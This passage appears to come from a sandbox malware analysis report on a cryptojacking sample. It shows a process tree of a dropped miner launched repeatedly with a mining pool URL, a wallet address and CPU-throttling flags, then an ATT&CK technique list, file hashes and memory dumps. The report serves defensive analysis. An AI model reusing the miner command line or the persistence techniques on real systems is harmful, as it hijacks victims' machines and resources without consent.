C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6036

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
PID:5888

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:5832

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
PID:5948

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6112

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6108

C:\Windows\SysWOW64\cmd.exe
cmd /c ipconfig /flushdns
2⤵
PID:5956

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
3⤵
- Gathers network information
PID:3344

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
PID:1988

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5824

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5096

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5832

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
2⤵
PID:6044

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spreadTpqrst.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1236

C:\ProgramData\spreadTpqrst.exe
C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
2⤵
- Executes dropped EXE
PID:1100

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Command and Scripting Interpreter

1

T1059

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SMB.exe
Filesize
3.1MB

MD5
7b2f170698522cd844e0423252ad36c1

SHA1
303ac0aaf0e9f48d4943e57d1ee6c757f2dd48c5

SHA256
5214f356f2e8640230e93a95633cd73945c38027b23e76bb5e617c71949f8994

SHA512
7155477e6988a16f6d12a0800ab72b9b9b64b97a509324ac0669cec2a4b82cd81b3481ae2c2d1ce65e73b017cebb56628d949d6195aac8f6ddd9625a80789dfa

Download Submit
C:\ProgramData\X64.dll
Filesize
85KB

MD5
e0cba19ae05af38d683f0142b7830098

SHA1
f11f76ab015eba86408d58df703c4924ecbcfce5

SHA256
1b88b455ca4e3340749ab5a1aecb8540dc36deed61b8d8c7e83f75b40452254b

SHA512
63d6390737462feb496373c15d363c1c43a6f8a82ba04c41afc49c473681391607afbdb9eae2cfcf460d55a1a0d640e951c1c6b717cab892ca3c47bf3ec77a51

Download Submit
C:\ProgramData\X86.dll
Filesize
71KB

MD5
1714f5eea5939f5683d6a94fa9dee08f

SHA1
def4a7c8cfa0db9aafdc4f29872dc916777b57fb

SHA256
549c16048586a212e4f1d1b27411628a14b21defee427c1c48840024c8cbfd4f

SHA512
c1a9143584f8ca9397c2a49ea130ea3dee37d984a66df740cd8de97ef7c12800edb72f306d0a135aee616e5a657b73b2a0f35a334e54ef0be71c230fc01655d2

Download Submit
C:\ProgramData\spreadTpqrst.exe
Filesize
1.3MB

MD5
23d84a7ed2e8e76d0a13197b74913654

SHA1
23d04ba674bafbad225243dc81ce7eccd744a35a

SHA256
ac530d542a755ecce6a656ea6309717ec222c34d7e34c61792f3b350a8a29301

SHA512
aa6b0100d477214d550b6498787190fc1a8fafa7c478f9595d45e4e76ece9888b84dcca26696500d5710a9d1acae4810f2606d8962c46d31f2bdfcdd27bd675c

Download Submit
memory/1100-218-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/1348-180-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/2688-142-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/2892-153-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/3020-184-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/3028-204-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/3084-188-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/4304-148-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/4304-150-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/4436-169-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/4452-10-0x000002BB86D40000-0x000002BB86D54000-memory.dmp

Filesize
80KB

Download
memory/4452-132-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/4452-8-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/4452-138-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/4552-157-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/5096-211-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/5832-215-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/5832-214-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/5908-161-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/5980-173-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/6036-200-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/6068-165-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/6104-176-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/6108-208-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download
memory/6108-207-0x00007FF78FA00000-0x00007FF790044000-memory.dmp

Filesize
6.3MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads